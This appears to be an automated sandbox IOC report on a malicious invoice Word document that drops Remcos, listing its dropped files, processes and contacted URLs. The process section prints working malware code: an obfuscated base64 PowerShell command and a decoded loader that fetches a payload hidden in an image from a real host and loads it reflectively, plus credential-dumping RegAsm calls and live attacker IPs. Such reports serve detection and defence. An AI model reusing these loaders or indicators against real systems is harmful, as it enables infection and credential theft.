IOC Report
Invoice No. 03182024.docx

loading gif

Files

File Path
Type
Category
Malicious
Invoice No. 03182024.docx
Microsoft Word 2007+
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\metheonecreatedentireproblemstounderstandeverythingtodogreatwithmeialwaysgoodnootherissues__megreattohearthatallgood[1].doc
Rich Text Format data, version 1
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47390428.doc
Rich Text Format data, version 1
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F6964D84-261D-4FF7-9BE3-D4E92B642D79}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
malicious
C:\Users\user\AppData\Roaming\IEnetworkingsloveking.vbs
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\NcsEL.url
MS Windows 95 Internet shortcut text (URL=<http://pop.tg/NcsEL>), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Rmc on 23.94.36.10.url
MS Windows 95 Internet shortcut text (URL=<http://23.94.36.10/110/Rmc/>), ASCII text, with CRLF line terminators
dropped
malicious
C:\ProgramData\WDFF.vbs
Non-ISO extended-ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF473794.TMP (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
SQLite 3.x database, last written using SQLite version 3024000, file counter 15, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 15
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\57ot5[1].txt
Unicode text, UTF-8 text, with very long lines (10775), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IEnetworkings[1].htm
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2FB8476.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D12BDFF.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD752609.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF8E3FF4.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0D245E14-43FB-4379-937C-3C588D2D07BC}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BFCBA731-EC8B-4909-A600-AB9A6A829A9D}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CAAA8960-F3D9-4B63-AA69-96FD605AC557}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\bhvFCA7.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x098f0610, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\dsj11ivm.nqx.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\e2ael1nw.zd1.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\j1qznt0n.ao4.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\n0zjjnjd.0yg.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\rjedrzrl.4py.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\unzpgbuzp
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\wm3wkiaa.mdd.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\{1F0847CA-48A9-402E-A6EE-5D3C254B8229}
data
dropped
C:\Users\user\AppData\Local\Temp\{28482427-7AC3-4162-8087-CB634E8E31EC}
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Invoice No. 03182024.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Fri Apr 19 07:04:46 2024, length=449790, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [misc]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$voice No. 03182024.docx
data
dropped
There are 33 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEnetworkingsloveking.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRgBEDgTreFcDgTreLwDgTrewDgTreDEDgTreMQDgTrevDgTreDDgTreDgTreMQDgTreuDgTreDYDgTreMwDgTreuDgTreDQDgTreOQDgTreuDgTreDMDgTreMgDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreVwBEDgTreEYDgTreRgDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDW/011/01.63.49.32//:ptth' , '1' , 'C:\ProgramData\' , 'WDFF','RegAsm',''))} }"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WDFF.vbs
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\unzpgbuzp"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\eqehhufsdipmn"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\okkaimqurqhzxxxg"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\okkaimqurqhzxxxg"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\WDFF.vbs"
malicious
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://23.94.36.10/110/IEnetworkings.html
23.94.36.10
malicious
https://uploaddeimagens.com.
unknown
malicious
http://geoplugin.net/json.gp/C
unknown
malicious
http://23.94.36.10/110/WDF.txt
23.94.36.10
malicious
http://23.94.36.10/110/Rmc/metheonecreatedentireproblemstounderstandeverythingtodogreatwithmeialwaysgoodnootherissues__megreattohearthatallgood.doc
23.94.36.10
malicious
192.210.201.57
malicious
http://geoplugin.net/json.gp
178.237.33.50
malicious
https://uploaddeimagens.com.br/images/00
unknown
malicious
https://uploaddeimagens.com.br
unknown
malicious
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
172.67.215.45
malicious
http://b.scorecardresearch.com/beacon.js
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://23.94.36.10/110/IEnetworkings.htmlrrC:
unknown
http://ocsp.entrust.net03
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
http://23.94.36.10/110/Rmc/
unknown
https://contoso.com/License
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
https://analytics.paste.ee
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
http://www.nirsoft.net
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
https://paste.ee/
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
https://paste.ee/d/57ot5
104.21.84.67
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
https://paste.ee/d/57ot5g
unknown
http://23.94.36.10/110/IEnetworkings.htmlj
unknown
http://crl.entrust.net/server1.crl0
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
https://www.google.com;
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://contextual.media.net/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://www.msn.com/
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://23.94.36.10/110/IEnetworkings.htmlQ
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
